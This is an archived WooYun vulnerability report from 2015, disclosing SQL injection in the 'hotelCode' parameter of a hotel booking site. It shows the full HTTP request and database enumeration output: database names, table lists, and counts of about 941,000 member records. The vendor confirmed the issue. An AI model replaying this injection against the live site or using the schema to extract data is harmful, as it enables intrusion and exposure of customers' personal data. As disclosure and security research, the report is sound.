乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
主站注入,参数hotelCode
POST /HotelDetail/GetHotelTopicCommentList HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://www.998.comReferer: http://www.998.com/HotelDetail?hotelcode=162509X-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: www.998.comCookie: ASP.NET_SessionId=i51hfgoksxegudb3myo4dllh; CitySearchHis=1208_c%24%e6%a0%aa%e6%b4%b2%e5%b8%82%242015%2f10%2f25+9%3a10%3a19%7c1133_c%24%e6%bc%b3%e5%b7%9e%e5%b8%82%242015%2f10%2f25+9%3a10%3a32%7c753_c%24%e7%83%9f%e5%8f%b0%e5%b8%82%242015%2f10%2f25+9%3a11%3a17%7c1854_c%24%e6%9e%a3%e5%ba%84%e5%b8%82%242015%2f10%2f25+9%3a11%3a52%7c490_c%24%e9%83%91%e5%b7%9e%e5%b8%82%242015%2f10%2f25+9%3a11%3a53%7c1792_c%24%e5%bc%a0%e6%8e%96%e5%b8%82%242015%2f10%2f25+9%3a11%3a58%7c765_c%24%e5%bb%b6%e5%90%89%e5%b8%82%242015%2f10%2f25+9%3a23%3a46%7c3205_c%24%e4%b8%ad%e5%8d%ab%e5%b8%82%242015%2f10%2f25+9%3a23%3a48%7c1073_c%24%e7%8e%89%e6%9e%97%e5%b8%82%242015%2f10%2f25+9%3a24%3a39%7c3156_c%24%e5%bf%bb%e5%b7%9e%e5%b8%82%242015%2f10%2f25+9%3a25%3a23%7c226%24shanghai%242015%2f10%2f25+9%3a27%3a59%7c; HotelCookie1=162509%7c%e9%9d%92%e7%9a%ae%e6%a0%91%e9%9f%a9%e5%9b%bd%e9%a6%96%e5%b0%94%e5%b8%82%e4%b8%9c%e5%a4%a7%e9%97%a8%e9%85%92%e5%ba%97%7chttp%3a%2f%2fa3.greentree.cn%3a8022%2f%2fUploadFiles%2fcrs%2fHotelImg%2f162509%2fLogo%2fLOGO_162509_3.jpg%7c5%7c0%7cVatica+South+Korea+Seoul+Dongdaemun+Design+Plaza+Hotel+; HotelCookie2=; HotelCookie3=; HotelCookie4=; HotelCookie5=Content-Length: 41Accept-Encoding: gzip, deflatehotelCode=162509&pagerIndex=1&pagerSize=5当前用户[03:16:21] [INFO] retrieved: NewWeb_GTOW_InterFacecurrent user: 'NewWeb_GTOW_InterFace'available databases [29]:[*] AspTempState[*] crs_interface[*] DBA[*] distribution[*] ERP[*] erp_budgetdata[*] ERPReport[*] ERPSession[*] GL2ZQMiddle[*] GTHC[*] GTHC_New[*] GTHCAnalysis[*] GTOW[*] GTTOZQ[*] H3[*] HMS_MAIL[*] LogsDB[*] master[*] Mis[*] model[*] msdb[*] newwebsite[*] PerfmonDB[*] ReportServer[*] ReportServerTempDB[*] RequireManage[*] tempdb[*] VirtualManagerDB[*] YekCMS[118 tables]+----------------------------------------+| 38ActivityPicture || 38ActivityVote || ActivityCommon || ActivityData || ActivityFIFAData || ActivityFIFASetting || ActivityInfo || CheckInMan || Cooperation_Details || Cooperation_Type || HotelGMapInfo || HotelInfo || HotelInfoView || HotelRank || HotelRank0 || HotelRank20140617 || HotelRankScore || HotelTopicComment || HotelTopicCommentAppend || MSpeer_conflictdetectionconfigrequest || MSpeer_conflictdetectionconfigresponse || MSpeer_lsns || MSpeer_originatorid_history || MSpeer_request || MSpeer_response || MSpeer_topologyrequest || MSpeer_topologyresponse || MSpub_identity_range || MSreplication_objects || MSreplication_subscriptions || MSsnapshotdeliveryprogress || MSsubscription_agents || MSsubscription_properties || M_BusinessDistrict || M_Meun || M_SystemMenu || MemberCardType || MemberInfo || MemberInfo20140617 || MemberInfo2014061701 || MemberMessage || MemberMessageText || MerchantAccounts || MerchantAccounts2015051201 || MerchantCollection || MerchantComment || MerchantCommentRespond || MerchantImages || MerchantInfo || MerchantInfoDesc || MerchantScore || MerchantType || MerchantVoucher || MobileCode || RoomType || SpringtourPicture || SpringtourVote || TActivityInfo || TAdvertisement || TBasicParamete || TBbsBoard || TBbsHits || TBbsReply || TBbsTopic || TBrandType || TCouponInfo || TCouponInfo20140613 || TDiscountInfo || THelpClass || THelpInfo || THelpInfo20150902 || THelpInfo2015090201 || THelpInfo2015090203 || THotCity || TLinkInfo || TNewsInfo || TOrderNumber || TShopConsigneeAddress || TShopCreditsRange || TShopGift || TShopGiftClass || TShopGiftProperty || TShopOrder || TShopShoppingCart || TSiteInfo || TSiteSeachHis || TUserAvatar || TVariable || VisitLog2013 || VisitLog2014 || VisitLog2014bk20140929 || VisitLog2015 || VisitLog2015bk20150203 || VisitLog2015bk20150206 || VisitLog2016 || VisitLog2017 || WebFilesNews || hotelArea || iccard_kinds || m_HotelColumnDescription || m_HotelInfoAttack || m_PointHotelWay || m_RoomInfoAttack || m_RoomTypeAttachment || m_aroundmappoint || m_iccard_kinds || syncobj_0x3231443445443443 || syncobj_0x3436333237323335 || sysarticlecolumns || sysarticles || sysarticleupdates || sysextendedarticlesview || syspublications || sysreplservers || sysschemaarticles || syssubscriptions || systranschemas || v_HotelArea |+----------------------------------------+用户941773个Database: GTOW+----------------+---------+| Table | Entries |+----------------+---------+| dbo.MemberInfo | 941773 |+----------------+---------+商家3414 个+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.MerchantAccounts | 3414 |敏感信息省略
危害等级:中
漏洞Rank:10
确认时间:2015-10-26 14:42
感谢提交,已通知相关人员处理。。。
暂无